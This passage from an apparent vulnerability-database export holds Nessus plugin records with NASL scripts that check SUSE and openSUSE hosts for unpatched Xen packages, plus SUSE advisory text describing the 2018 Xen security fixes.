script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-doc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools-domU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools-domU-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/10\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"3\", cpu:\"x86_64\", reference:\"xen-4.9.2_04-3.29.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", cpu:\"x86_64\", reference:\"xen-debugsource-4.9.2_04-3.29.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", cpu:\"x86_64\", reference:\"xen-doc-html-4.9.2_04-3.29.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", cpu:\"x86_64\", reference:\"xen-libs-32bit-4.9.2_04-3.29.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", cpu:\"x86_64\", reference:\"xen-libs-4.9.2_04-3.29.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", cpu:\"x86_64\", reference:\"xen-libs-debuginfo-32bit-4.9.2_04-3.29.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", cpu:\"x86_64\", reference:\"xen-libs-debuginfo-4.9.2_04-3.29.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", cpu:\"x86_64\", reference:\"xen-tools-4.9.2_04-3.29.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", cpu:\"x86_64\", reference:\"xen-tools-debuginfo-4.9.2_04-3.29.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", cpu:\"x86_64\", reference:\"xen-tools-domU-4.9.2_04-3.29.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", cpu:\"x86_64\", reference:\"xen-tools-domU-debuginfo-4.9.2_04-3.29.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"xen-4.9.2_04-3.29.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"xen-debugsource-4.9.2_04-3.29.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"xen-libs-32bit-4.9.2_04-3.29.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"xen-libs-4.9.2_04-3.29.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"xen-libs-debuginfo-32bit-4.9.2_04-3.29.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"xen-libs-debuginfo-4.9.2_04-3.29.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:37:33", "description": "This update for xen to version 4.9.2 fixes several issues.\n\nThis feature was added :\n\n - Added script, udev rule and systemd service to watch for\n vcpu online/offline events in a HVM domU. They are\n triggered via 'xl vcpu-set domU N'\n\nThese security issues were fixed :\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions\n on x86 (XSA-260, bsc#1090820)\n\n - Handle HPET timers in IO-APIC mode correctly to prevent\n malicious or buggy HVM guests from causing a hypervisor\n crash or potentially privilege escalation/information\n leaks (XSA-261, bsc#1090822)\n\n - Prevent unbounded loop, induced by qemu allowing an\n attacker to permanently keep a physical CPU core busy\n (XSA-262, bsc#1090823)\n\n - CVE-2018-10472: x86 HVM guest OS users (in certain\n configurations) were able to read arbitrary dom0 files\n via QMP live insertion of a CDROM, in conjunction with\n specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n\n - CVE-2018-10471: x86 PV guest OS users were able to cause\n a denial of service (out-of-bounds zero write and\n hypervisor crash) via unexpected INT 80 processing,\n because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n\n - CVE-2018-7540: x86 PV guest OS users were able to cause\n a denial of service (host OS CPU hang) via\n non-preemptable L3/L4 pagetable freeing (bsc#1080635).\n\n - CVE-2018-7541: Guest OS users were able to cause a\n denial of service (hypervisor crash) or gain privileges\n by triggering a grant-table transition from v2 to v1\n (bsc#1080662).\n\n - CVE-2018-7542: x86 PVH guest OS users were able to cause\n a denial of service (NULL pointer dereference and\n hypervisor crash) by leveraging the mishandling of\n configurations that lack a Local APIC (bsc#1080634).\n\nThese non-security issues were fixed :\n\n - bsc#1087252: Update built-in defaults for xenstored in\n stubdom, keep default to run xenstored as daemon in dom0\n\n - bsc#1087251: Preserve xen-syms from xen-dbg.gz to allow\n processing vmcores with crash(1) \n\n - bsc#1072834: Prevent unchecked MSR access error This\n update was imported from the SUSE:SLE-12-SP3:Update\n update project.", "edition": 24, "cvss3": {"score": 8.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2018-05-14T00:00:00", "title": "openSUSE Security Update : xen (openSUSE-2018-454) (Meltdown)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2018-7540", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-7542", "CVE-2018-7541", "CVE-2018-8897"], "modified": "2018-05-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:xen-doc-html", "p-cpe:/a:novell:opensuse:xen-devel", "p-cpe:/a:novell:opensuse:xen", "p-cpe:/a:novell:opensuse:xen-tools-debuginfo", "p-cpe:/a:novell:opensuse:xen-libs", "p-cpe:/a:novell:opensuse:xen-tools-domU-debuginfo", "p-cpe:/a:novell:opensuse:xen-libs-debuginfo", "p-cpe:/a:novell:opensuse:xen-debugsource", "cpe:/o:novell:opensuse:42.3", "p-cpe:/a:novell:opensuse:xen-tools", "p-cpe:/a:novell:opensuse:xen-tools-domU"], "id": "OPENSUSE-2018-454.NASL", "href": "https://www.tenable.com/plugins/nessus/109751", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-454.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(109751);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2017-5754\", \"CVE-2018-10471\", \"CVE-2018-10472\", \"CVE-2018-7540\", \"CVE-2018-7541\", \"CVE-2018-7542\", \"CVE-2018-8897\");\n script_xref(name:\"IAVA\", value:\"2018-A-0019\");\n script_xref(name:\"IAVB\", value:\"2018-B-0057\");\n\n script_name(english:\"openSUSE Security Update : xen (openSUSE-2018-454) (Meltdown)\");\n script_summary(english:\"Check for the openSUSE-2018-454 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for xen to version 4.9.2 fixes several issues.\n\nThis feature was added :\n\n - Added script, udev rule and systemd service to watch for\n vcpu online/offline events in a HVM domU. They are\n triggered via 'xl vcpu-set domU N'\n\nThese security issues were fixed :\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions\n on x86 (XSA-260, bsc#1090820)\n\n - Handle HPET timers in IO-APIC mode correctly to prevent\n malicious or buggy HVM guests from causing a hypervisor\n crash or potentially privilege escalation/information\n leaks (XSA-261, bsc#1090822)\n\n - Prevent unbounded loop, induced by qemu allowing an\n attacker to permanently keep a physical CPU core busy\n (XSA-262, bsc#1090823)\n\n - CVE-2018-10472: x86 HVM guest OS users (in certain\n configurations) were able to read arbitrary dom0 files\n via QMP live insertion of a CDROM, in conjunction with\n specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n\n - CVE-2018-10471: x86 PV guest OS users were able to cause\n a denial of service (out-of-bounds zero write and\n hypervisor crash) via unexpected INT 80 processing,\n because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n\n - CVE-2018-7540: x86 PV guest OS users were able to cause\n a denial of service (host OS CPU hang) via\n non-preemptable L3/L4 pagetable freeing (bsc#1080635).\n\n - CVE-2018-7541: Guest OS users were able to cause a\n denial of service (hypervisor crash) or gain privileges\n by triggering a grant-table transition from v2 to v1\n (bsc#1080662).\n\n - CVE-2018-7542: x86 PVH guest OS users were able to cause\n a denial of service (NULL pointer dereference and\n hypervisor crash) by leveraging the mishandling of\n configurations that lack a Local APIC (bsc#1080634).\n\nThese non-security issues were fixed :\n\n - bsc#1087252: Update built-in defaults for xenstored in\n stubdom, keep default to run xenstored as daemon in dom0\n\n - bsc#1087251: Preserve xen-syms from xen-dbg.gz to allow\n processing vmcores with crash(1) \n\n - bsc#1072834: Prevent unchecked MSR access error This\n update was imported from the SUSE:SLE-12-SP3:Update\n update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1027519\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1072834\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1080634\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1080635\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1080662\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1087251\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1087252\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1089152\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1089635\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1090820\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1090822\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1090823\"\n );\n # https://features.opensuse.org/324965\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://features.opensuse.org/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xen packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-doc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-domU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-domU-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"xen-4.9.2_04-19.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"xen-debugsource-4.9.2_04-19.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"xen-devel-4.9.2_04-19.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"xen-doc-html-4.9.2_04-19.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"xen-libs-4.9.2_04-19.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"xen-libs-debuginfo-4.9.2_04-19.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"xen-tools-4.9.2_04-19.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"xen-tools-debuginfo-4.9.2_04-19.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"xen-tools-domU-4.9.2_04-19.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"xen-tools-domU-debuginfo-4.9.2_04-19.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen / xen-debugsource / xen-devel / xen-doc-html / xen-libs / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T06:49:13", "description": "This update for xen fixes several issues.\n\nThese security issues were fixed :\n\nCVE-2018-8897: Prevent mishandling of debug exceptions on x86\n(XSA-260, bsc#1090820)\n\nHandle HPET timers in IO-APIC mode correctly to prevent malicious or\nbuggy HVM guests from causing a hypervisor crash or potentially\nprivilege escalation/information leaks (XSA-261, bsc#1090822)\n\nPrevent unbounded loop, induced by qemu allowing an attacker to\npermanently keep a physical CPU core busy (XSA-262, bsc#1090823)\n\nCVE-2018-10472: x86 HVM guest OS users (in certain configurations)\nwere able to read arbitrary dom0 files via QMP live insertion of a\nCDROM, in conjunction with specifying the target file as the backing\nfile of a snapshot (bsc#1089152).\n\nCVE-2018-10471: x86 PV guest OS users were able to cause a denial of\nservice (out-of-bounds zero write and hypervisor crash) via unexpected\nINT 80 processing, because of an incorrect fix for CVE-2017-5754\n(bsc#1089635).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 21, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-10-22T00:00:00", "title": "SUSE SLES12 Security Update : xen (SUSE-SU-2018:3230-1) (Meltdown)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-8897"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:xen-tools-debuginfo", "p-cpe:/a:novell:suse_linux:xen-doc-html", "p-cpe:/a:novell:suse_linux:xen-tools-domU-debuginfo", "p-cpe:/a:novell:suse_linux:xen-debugsource", "p-cpe:/a:novell:suse_linux:xen-tools-domU", "p-cpe:/a:novell:suse_linux:xen-libs-debuginfo", "p-cpe:/a:novell:suse_linux:xen-libs", "p-cpe:/a:novell:suse_linux:xen", "p-cpe:/a:novell:suse_linux:xen-tools"], "id": "SUSE_SU-2018-3230-1.NASL", "href": "https://www.tenable.com/plugins/nessus/118304", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:3230-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118304);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/09/10 13:51:49\");\n\n script_cve_id(\"CVE-2017-5754\", \"CVE-2018-10471\", \"CVE-2018-10472\", \"CVE-2018-8897\");\n\n script_name(english:\"SUSE SLES12 Security Update : xen (SUSE-SU-2018:3230-1) (Meltdown)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for xen fixes several issues.\n\nThese security issues were fixed :\n\nCVE-2018-8897: Prevent mishandling of debug exceptions on x86\n(XSA-260, bsc#1090820)\n\nHandle HPET timers in IO-APIC mode correctly to prevent malicious or\nbuggy HVM guests from causing a hypervisor crash or potentially\nprivilege escalation/information leaks (XSA-261, bsc#1090822)\n\nPrevent unbounded loop, induced by qemu allowing an attacker to\npermanently keep a physical CPU core busy (XSA-262, bsc#1090823)\n\nCVE-2018-10472: x86 HVM guest OS users (in certain configurations)\nwere able to read arbitrary dom0 files via QMP live insertion of a\nCDROM, in conjunction with specifying the target file as the backing\nfile of a snapshot (bsc#1089152).\n\nCVE-2018-10471: x86 PV guest OS users were able to cause a denial of\nservice (out-of-bounds zero write and hypervisor crash) via unexpected\nINT 80 processing, because of an incorrect fix for CVE-2017-5754\n(bsc#1089635).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1027519\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1086039\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1089152\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1089635\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090820\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090822\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090823\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-5754/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10471/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10472/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8897/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20183230-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2c34e0db\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-SP2-BCL:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-BCL-2018-841=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-doc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools-domU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools-domU-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/22\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, 